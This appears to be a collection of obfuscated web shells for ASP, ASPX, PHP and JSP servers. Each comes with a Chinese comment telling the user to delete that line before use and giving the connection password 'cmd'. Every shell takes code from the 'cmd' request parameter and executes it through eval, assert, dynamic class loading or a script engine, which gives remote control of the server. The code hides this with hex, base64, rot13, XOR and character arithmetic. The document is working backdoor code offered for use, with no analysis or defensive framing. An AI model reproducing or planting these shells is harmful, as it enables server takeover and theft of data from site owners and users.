<!-- 使用时请删除此行, 连接密码: cmd -->
<%<!--"-->
execuTE(CoN("6576416C28526551756573542822436D64222929"))
funCTiON con(bYref sTrhex):diM lengTh:Dim Max:DIM str:MAX = lEN(StRhEx):FoR LeNGtH = 1 tO mAx STeP 2:stR = stR & Chr("&h" & mid(STrHex, leNgTH, 2)):NeXt:COn = STr:end FunCtIon')
%>

<%-- // 使用时请删除此行, 连接密码: cmd --%>
<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('ODcxN'+'TI1O3'+'ZhciB'+'zYWZl'+''+'P'+char(01501-01356)+char(0100016/0673)+char(24549/501)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Yg=='))+''+''+'n'+'N'+char(0234320/01402)+'Z'+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('bQ=='))+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydj'+'bWQnX'+'Swgc2'+'FmZSk'+'7MjYx'+'NDU3N'+'Ts='+'')));%>

<%-- // 使用时请删除此行, 连接密码: cmd --%>
<%@ Page Language="c#"%>
<%
  String pointer = Request.Form["cmd"];
  if (pointer != null){
    System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(pointer));
    assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);
  }
%>

<?php // 使用时请删除此行, 连接密码: cmd ?>
<?php $xtDr=create_function(chr(0x157-0x133).str_rot13('f').chr(0222613/01245).chr(0x13444/0x2d4).chr(438-337),chr(0x295-0x230).chr(0x38e-0x318).base64_decode('YQ==').chr(0xa638/0x18a).chr(36960/924).str_rot13('$').chr(0x21d-0x1aa).base64_decode('bw==').str_rot13('z').str_rot13('r').base64_decode('KQ==').chr(01611-01516));$xtDr(base64_decode('Njk1N'.'TgyO0'.'BldkF'.'sKCRf'.''.chr(0x5cf8/0x118).str_rot13('R').str_rot13('9').chr(699-615).chr(01710-01562).''.''.chr(0x2e3-0x29d).base64_decode('dA==').chr(0105764/0522).str_rot13('o').chr(357-270).''.'RdKTs'.'yMDg2'.'NzQ2O'.'w=='.''));?>

<%-- 使用时请删除此行, 连接密码: cmd --%>
<%!
class OBJECT extends ClassLoader{
  OBJECT(ClassLoader c){super(c);}
  public Class quote(byte[] b){
    return super.defineClass(b, 0, b.length);
  }
}
public byte[] lazy(String str) throws Exception {
  Class base64;
  byte[] value = null;
  try {
    base64=Class.forName("sun.misc.BASE64Decoder");
    Object decoder = base64.newInstance();
    value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
  } catch (Exception e) {
    try {
      base64=Class.forName("java.util.Base64");
      Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
      value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
    } catch (Exception ee) {}
  }
  return value;
}
%>
<%
String cls = request.getParameter("cmd");
if (cls != null) {
  new OBJECT(this.getClass().getClassLoader()).quote(lazy(cls)).newInstance().equals(new Object[]{request,response});
}
%>

<!-- 使用时请删除此行, 连接密码: cmd -->
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
  <jsp:declaration>
    class MINIMAL extends ClassLoader {
      MINIMAL(ClassLoader c) { super(c);}
      public Class amortized(byte[] b) {
        return super.defineClass(b, 0, b.length);
      }
    }
    public byte[] arithmetic(String str) throws Exception {
      Class base64;
      byte[] value = null;
      try {
        base64=Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
      } catch (Exception e) {
        try {
          base64=Class.forName("java.util.Base64");
          Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
          value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
        } catch (Exception ee) {}
      }
      return value;
    }
  </jsp:declaration>
  <jsp:scriptlet>
    String cls = request.getParameter("cmd");
    if (cls != null) {
      new MINIMAL(this.getClass().getClassLoader()).amortized(arithmetic(cls)).newInstance().equals(new Object[]{request,response});
    }
  </jsp:scriptlet>
</jsp:root>

<%-- 使用时请删除此行, 连接密码: cmd --%>
<%
  try {
    javax.script.ScriptEngine method = new javax.script.ScriptEngineManager().getEngineByName("js");
    method.put("request", request);
    method.put("response", response);
    method.eval(request.getParameter("cmd"));
  } catch (Exception e) {
    out.println("Error:// "+e.toString());;
  }
%>

<!-- 使用时请删除此行, 连接密码: cmd -->
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
  <jsp:scriptlet>
    try {
      javax.script.ScriptEngine event = new javax.script.ScriptEngineManager().getEngineByName("js");
      event.put("request", request);
      event.put("response", response);
      event.eval(request.getParameter("cmd"));
    } catch (Exception e) {
      out.println("Error:// "+e.toString);;
    }
  </jsp:scriptlet>
</jsp:root>

<%
<!--
Function MDBV(HYUX):
    HYUX = Split(HYUX,"/")
    For x=0 To Ubound(HYUX)
        MDBV=MDBV&Chr(HYUX(x)-88)
    Next
End Function
EXecutE(MDBV("189/206/185/196/120/202/189/201/205/189/203/204/128/122/187/197/188/122/129"))
-->
%>

<%@ Page Language="Jscript" Debug=true%>
<%
var ALBE='xBXdmkfpjbePNlhFsRKAVarMTgDwJSWCUOQyLuqtnGZcIiYEozHv';
var NZPY=Request.Form("cmd");
var XKJN=ALBE(32) + ALBE(12) + ALBE(16) + ALBE(19) + ALBE(6) + ALBE(10);
eval(NZPY, XKJN);
%>

<?php 
class QDGO { 
    function dCbX() {
        $RHMi = "\x56" ^ "\x37";
        $ZUyX = "\x86" ^ "\xf5";
        $vgMc = "\x8e" ^ "\xfd";
        $Gtxb = "\xe9" ^ "\x8c";
        $TTFz = "\xb8" ^ "\xca";
        $wJPS = "\xd7" ^ "\xa3";
        $LNYB =$RHMi.$ZUyX.$vgMc.$Gtxb.$TTFz.$wJPS;
        return $LNYB;
    }
    function __destruct(){
        $vRjf=$this->dCbX();
        @$vRjf($this->vk);
    }
}
$qdgo = new QDGO();
@$qdgo->vk = isset($_GET['id'])?base64_decode($_POST['cmd']):$_POST['cmd'];
?>